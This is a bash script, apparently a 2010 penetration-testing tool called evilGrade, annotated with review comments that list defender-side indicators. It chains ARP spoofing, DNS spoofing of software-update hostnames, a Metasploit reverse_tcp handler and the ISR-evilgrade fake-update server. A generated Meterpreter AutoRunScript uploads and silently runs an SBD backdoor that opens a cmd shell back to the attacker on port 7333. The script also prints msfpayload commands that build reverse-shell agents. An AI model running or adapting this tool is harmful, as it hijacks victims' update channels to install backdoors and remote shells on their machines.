#!/bin/bash
# (C)opyright 2010 - g0tmi1k
# evilGrade v0.1.1 (2010-05-16)
#
# Driver script that chains ARP spoofing, DNS spoofing, a Metasploit handler,
# an SBD listener and ISR-evilgrade so that a target's software-update
# hostnames (listed in the host-file section further down) resolve to this
# host. Everything runs as top-level code, in this order: settings, the
# cleanup() handler, argument handling, environment setup, then the tools.
# Defender's view of the footprint this produces: the target's ARP entry for
# its gateway changes, DNS answers for the listed update hostnames point at a
# LAN address, fixed file names appear in /tmp on the attacking host, and the
# dropped sbd.exe makes an outbound connection to port 7333 (configured below).
# NOTE(review): written for a 2010 BackTrack-style system (net-tools route /
# ifconfig output formats, /etc/init.d, /pentest paths); not re-verified here.

# Settings (Change theses)
# Interface facing the target and gateway; read by ifconfig, dhclient, dnsspoof and arpspoof below.
export gateway_interface=eth0
# Directory holding ./evilgrade (used by the cd at the end of the script).
# Lowercase "path" is a separate variable from PATH under bash.
export path=~/isr-evilgrade/

# Settings (Leave theses)
# Default gateway: awk prints the 2nd field of the line *after* the first line
# starting with "default" (getline advances one line).
# NOTE(review): presumably matches the route output of the era — confirm.
export gatewayIP=`route | awk '/^default/ {getline; print $2}'`
# Our own address on the interface: the part after "addr:" in ifconfig's "inet addr:" line.
export ourIP=`ifconfig $gateway_interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`
export version="0.1.1"

# Only SIGINT (signal 2, Ctrl+C) is trapped; no other exit path runs cleanup().
trap 'cleanup' 2 #Interrupt

#######################################
# Remove the files this script writes to /tmp, then exit.
# The three paths are fixed, so their presence on a host is a direct on-disk
# indicator of this tooling. Nothing else is restored (ip_forward and the
# stopped web server, both changed later in the script, are left as they are).
# Globals:   none written
# Outputs:   progress messages to stdout
# Returns:   exits the script (status of the last echo, i.e. 0)
#######################################
cleanup() {
  echo ""
  echo "[>] Cleaning up..."
  if test -e /tmp/host.dns; then rm /tmp/host.dns; fi
  if test -e /tmp/g0tmi1kEvilGrade.rb; then rm /tmp/g0tmi1kEvilGrade.rb; fi
  if test -e /tmp/g0tmi1k-evilgrade.exe; then rm /tmp/g0tmi1k-evilgrade.exe; fi
  echo "[>] Done! (= Have you... g0tmi1k?"
  exit
}

# Main
echo "[*] g0tmi1ks (semi)auto EvilGrade v$version"
# Usage text on -h / /h / -? / /?; otherwise $1 is the target address, and if
# no argument was given it is prompted for interactively.
if [ "$1" == "-h" ] || [ "$1" == "/h" ] || [ "$1" == "-?" ] || [ "$1" == "/?" ]
then
  echo "(C)opyright g0tmi1k 2010 ~ http://g0tmi1k.blogspot.com"
  echo ""
  echo "sh evilGrade.sh IPAddress"
  echo ""
  echo "This is a script to automate an attack using EvilGrade with the end goal of forcing the victim to download our backdoor when they try to update a program"
  echo "One day it will be cross platform, coded better and with many more options/settings..."
  exit
elif [ "$1" ]
then
  export targetIP=$1
  echo "[>] Target address?: $targetIP"
else
  # read without -r: backslashes in the typed value are interpreted.
  read -p "[>] Target address?: " targetIP
fi
# Range check on each dotted-quad field (split on "."). It is advisory only:
# the "exit" inside the awk program ends awk, not this shell, so an
# out-of-range value is reported and then used unchanged.
if [ "$targetIP" ]
then
  echo "$targetIP" | nawk -F. '{ if ( (($1>=0) && ($1<=255)) && (($2>=0) && ($2<=255)) && (($3>=0) && ($3<=255)) && (($4>=0) && ($4<=255)) ) { } else { print("[-] "$0 ": IP address out of range!"); exit; } }'
else
  # Empty target: the message below prints an empty name. The "everyone" mode
  # is not implemented, so targetIP stays empty for the rest of the script.
  echo "[-] $targetIP is not a valid IP address!"
  echo "[>] Setting target IP: *everyoneone*" #NOT YET!
  export targetIP="";
fi
echo "[>] Setting up our end..."
#Stopping any current web servers
# Runs synchronously (no trailing &, unlike the later xterm calls), so the
# script waits for the init script to return before continuing.
xterm -geometry 85x15+10+0 -T "[EvilGrade] v$version - Stopping current web servers" -e "/etc/init.d/apache2 stop"

#Make sure we have an IP address
# If ifconfig produced nothing earlier, request a lease on the interface and
# re-read the address with the same awk extraction as at the top of the file.
if [ "$ourIP" == "" ]
then
  xterm -geometry 85x15+10+0 -T "[EvilGrade] v$version - Acquiring an IP Address" -e "dhclient $gateway_interface"
  sleep 1
  export ourIP=`ifconfig $gateway_interface | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`
fi

# Enable IP Forwarding
# Makes this host route the traffic it attracts between target and gateway
# (writing here requires root). cleanup() does not reset it, so a host left
# with ip_forward=1 is one of the post-incident indicators of this tooling.
echo "1" > /proc/sys/net/ipv4/ip_forward

# Host file
# One "<ourIP> <hostname>" line per update-check hostname; dnsspoof (started
# later) reads this file and answers queries for these names with our address.
# For a defender these are exactly the names to watch for resolving to a LAN
# address, and the update channels that need signed/authenticated updates.
# The first line truncates any previous file (>), the rest append (>>);
# notepad-plus.sourceforge.net is listed twice.
echo "$ourIP notepad-plus.sourceforge.net" > /tmp/host.dns
echo "$ourIP notepadplus.sourceforge.net" >> /tmp/host.dns
echo "$ourIP update.speedbit.com" >> /tmp/host.dns
echo "$ourIP itunes.com" >> /tmp/host.dns
echo "$ourIP download.linkedin.com" >> /tmp/host.dns
echo "$ourIP notepad-plus.sourceforge.net" >> /tmp/host.dns
echo "$ourIP update23.services.openoffice.org" >> /tmp/host.dns
echo "$ourIP update.services.openoffice.org" >> /tmp/host.dns
echo "$ourIP swscan.apple.com" >> /tmp/host.dns
echo "$ourIP online.speedbit.com" >> /tmp/host.dns
echo "$ourIP java.sun.com" >> /tmp/host.dns
echo "$ourIP client.winamp.com" >> /tmp/host.dns
echo "$ourIP www.winamp.com" >> /tmp/host.dns
echo "$ourIP update.winzip.com" >> /tmp/host.dns

#For metasploit
# Meterpreter AutoRunScript written line by line to a fixed /tmp path and
# passed to msfcli below. On a new session it uploads /var/www/sbd.exe to the
# target (presumably upload_file(destination, source) — confirm) and runs it
# so that it connects back to $ourIP on port 7333 with the key "g0tmi1k"; the
# local "sbd -l" listener later in the script uses the same key and port.
# The six commented-out echo lines were a kill/delete step for an older copy
# of sbd.exe and are not emitted into the file.
# Backslash note: inside double quotes "\\\s" reaches the file as "\\s".
echo "#! /usr/bin/env ruby" > /tmp/g0tmi1kEvilGrade.rb
echo "# (C)opyright 2010 - g0tmi1k" >> /tmp/g0tmi1kEvilGrade.rb
echo "# g0tmi1kEvilGrade.rb v$version" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_line(\"[>] g0tmi1ks Evil Grade v$version...\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "session = client" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
# echo "print_status(\"Killing any old SBD (Secure BackDoor)...\")" >> /tmp/g0tmi1kEvilGrade.rb
# echo "session.sys.process.execute(\"cmd.exe /C taskkill /IM /F sbd.exe\", nil, {'Hidden' => true})" >> /tmp/g0tmi1kEvilGrade.rb
# echo "" >> /tmp/g0tmi1kEvilGrade.rb
# echo "print_status(\"Removing any old SBD (Secure BackDoor)...\")" >> /tmp/g0tmi1kEvilGrade.rb
# echo "session.sys.process.execute(\"cmd.exe /C del /F /Q %SystemDrive%\\\sbd.exe\", nil, {'Hidden' => true})" >> /tmp/g0tmi1kEvilGrade.rb
# echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Uploading SBD (Secure BackDoor)...\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "session.fs.file.upload_file(\"%SystemDrive%\\\sbd.exe\", \"/var/www/sbd.exe\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Uploaded! \")" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "sleep(1)" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Executing SBD...\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "session.sys.process.execute(\"C:\\\sbd.exe -q -r 10 -k g0tmi1k -e cmd -p 7333 $ourIP\", nil, {'Hidden' => true}) #Had a problem with %SystemDrive%" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Executed! \")" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "sleep(1)" >> /tmp/g0tmi1kEvilGrade.rb
echo "" >> /tmp/g0tmi1kEvilGrade.rb
echo "print_status(\"Done! (= Have you... g0tmi1k?\")" >> /tmp/g0tmi1kEvilGrade.rb
echo "sleep(1)" >> /tmp/g0tmi1kEvilGrade.rb
echo "[>] Starting metasploit..."
# Handler for the reverse Meterpreter payload that the evilgrade agent (see the
# "set agent" lines printed below) delivers; the AutoRunScript written above
# runs on every new session. Backgrounded with &, so the script continues.
xterm -geometry 75x15+530+0 -T "[EvilGrade] v$version - Metasploit" -e "/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourIP AutoRunScript=/tmp/g0tmi1kEvilGrade.rb E"&
sleep 3
echo "[>] Starting the \"Man In The Middle\" Attack..."
# dnsspoof answers the hostnames in /tmp/host.dns with our address; arpspoof
# tells $targetIP that $gatewayIP lives at our MAC. On the wire the observable
# change is the target's ARP entry for its gateway, which is what ARP
# inspection and gateway-MAC monitoring key on. If targetIP was left empty
# earlier, "-t" receives no value here.
xterm -geometry 85x7+0+0 -T "[EvilGrade] v$version - DNSSpoof" -e "dnsspoof -i $gateway_interface -f /tmp/host.dns" &
xterm -geometry 85x6+0+120 -T "[EvilGrade] v$version - ARPSpoof" -e "arpspoof -i $gateway_interface -t $targetIP $gatewayIP" &
sleep 2
echo "[>] Getting the backdoor (SBD) ready..."
# Listener for the connect-back from sbd.exe (see the AutoRunScript section);
# key (-k) and port (-p) must match what that script passes to sbd.exe.
xterm -geometry 163x11+0+225 -T "[EvilGrade] v$version - SBD" -e "sbd -l -k g0tmi1k -p 7333"&
sleep 2
echo "[>] Starting EvilGrade..."
# Operator guidance only: the evilgrade module names and the "set agent" lines
# that build the payload into /tmp/g0tmi1k-evilgrade.exe (the file cleanup()
# removes). Nothing below is executed by this script except evilgrade itself.
echo "Commands:"
echo "1.) Programs: (show modules)"
echo " config notepadplus"
echo " config osx"
echo " config itunes"
echo " config sunjava"
echo " config winzip"
echo " config winamp"
echo " config openoffice"
echo " config linkedin"
echo " config speedbit"
echo " config dap"
echo ""
echo "2.) Payloads: (show options)"
echo "Linux"
echo " set agent '[\"/pentest/exploits/framework3/msfpayload linux/x86/shell/reverse_tcp LHOST=$ourIP X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>\"]'"
echo "OSX"
echo " set agent '[\"/pentest/exploits/framework3/msfpayload osx/x86/shell_reverse_tcp LHOST=$ourIP X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>\"]'"
echo "Windows"
echo " set agent '[\"/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP X > <%OUT%>/tmp/g0tmi1k-evilgrade.exe<%OUT%>\"]'"
echo ""
echo "3.) start"
echo ""
echo "4.) exit or \"Ctrl + C\""
# Run evilgrade interactively from its own directory ($path is unquoted).
# cleanup() runs when evilgrade exits normally; Ctrl+C reaches it via the
# SIGINT trap set at the top of the file. The backgrounded xterms above are
# not terminated by either path.
cd $path
./evilgrade
cleanup